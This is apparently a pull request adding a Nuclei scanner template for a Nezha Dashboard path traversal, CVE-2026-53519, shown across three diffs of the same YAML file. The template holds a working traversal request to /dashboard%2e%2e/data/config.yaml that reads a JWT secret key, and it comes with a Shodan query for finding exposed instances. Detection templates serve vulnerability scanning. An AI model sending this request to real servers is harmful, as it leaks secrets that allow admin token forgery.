### PR TITLE
Add CVE-2026-53519 template

### DIFF
--- a/http/cves/2026/CVE-2026-53519.yaml
+++ b/http/cves/2026/CVE-2026-53519.yaml
@@ -1,21 +1,23 @@
 id: CVE-2026-53519
 
 info:
-  name: Nezha Dashboard < 2.0.13 - Unauthenticated Path Traversal Arbitrary File Read
+  name: Nezha Dashboard < 2.0.13 - Path Traversal
   author: str4k3r
   severity: critical
-  description: >
-    Nezha Dashboard before 2.0.13 uses strings.HasPrefix in the NoRoute
-    fallbackToFrontend handler, so any path starting with "/dashboard" is served
-    as a frontend asset. An unauthenticated request such as
-    /dashboard%2e%2e/data/config.yaml traverses out of the asset directory and
-    reads arbitrary files, including data/config.yaml which contains the
-    jwt_secret_key (enabling admin JWT forgery). Fixed in 2.0.13.
+  description: |
+    Nezha Monitoring < 2.0.13 contains a path traversal caused by improper prefix checking in the dashboard's NoRoute handler, letting unauthenticated attackers read arbitrary files via crafted URLs.
+  impact: |
+    Unauthenticated attackers can read arbitrary files on the server, potentially exposing sensitive configuration or data files.
+  remediation: |
+    Update to version 2.0.13 or later.
   reference:
     - https://github.com/nezhahq/nezha/security/advisories/GHSA-5c25-7vpj-9mqh
     - https://nvd.nist.gov/vuln/detail/CVE-2026-53519
   classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
+    cvss-score: 9.1
     cve-id: CVE-2026-53519
+    cwe-id: CWE-22
   metadata:
     verified: true
     shodan-query: 'title:"Nezha"'
@@ -25,12 +27,14 @@ http:
   - method: GET
     path:
       - "{{BaseURL}}/dashboard%2e%2e/data/config.yaml"
+
     matchers-condition: and
     matchers:
       - type: status
         status:
           - 200
-      - type: regex
+
+      - type: word
         part: body
-        regex:
+        words:
           - "jwt_secret_key:"

--- a/http/cves/2026/CVE-2026-53519.yaml
+++ b/http/cves/2026/CVE-2026-53519.yaml
@@ -20,7 +20,7 @@ info:
     cwe-id: CWE-22
   metadata:
     verified: true
-    shodan-query: 'title:"Nezha"'
+    shodan-query: title:"Nezha"
   tags: cve,cve2026,nezha,lfi,traversal,unauth
 
 http:
@@ -30,11 +30,11 @@ http:
 
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
-
       - type: word
         part: body
         words:
           - "jwt_secret_key:"
+
+      - type: status
+        status:
+          - 200

--- a/http/cves/2026/CVE-2026-53519.yaml
+++ b/http/cves/2026/CVE-2026-53519.yaml
@@ -1,0 +1,36 @@
+id: CVE-2026-53519
+
+info:
+  name: Nezha Dashboard < 2.0.13 - Unauthenticated Path Traversal Arbitrary File Read
+  author: str4k3r
+  severity: critical
+  description: >
+    Nezha Dashboard before 2.0.13 uses strings.HasPrefix in the NoRoute
+    fallbackToFrontend handler, so any path starting with "/dashboard" is served
+    as a frontend asset. An unauthenticated request such as
+    /dashboard%2e%2e/data/config.yaml traverses out of the asset directory and
+    reads arbitrary files, including data/config.yaml which contains the
+    jwt_secret_key (enabling admin JWT forgery). Fixed in 2.0.13.
+  reference:
+    - https://github.com/nezhahq/nezha/security/advisories/GHSA-5c25-7vpj-9mqh
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-53519
+  classification:
+    cve-id: CVE-2026-53519
+  metadata:
+    verified: true
+    shodan-query: 'title:"Nezha"'
+  tags: cve,cve2026,nezha,lfi,traversal,unauth
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/dashboard%2e%2e/data/config.yaml"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: regex
+        part: body
+        regex:
+          - "jwt_secret_key:"


### PR DESCRIPTION
Adds the Nuclei template for this CVE as an ecosystem contribution. The template follows the repository format and references the public advisory.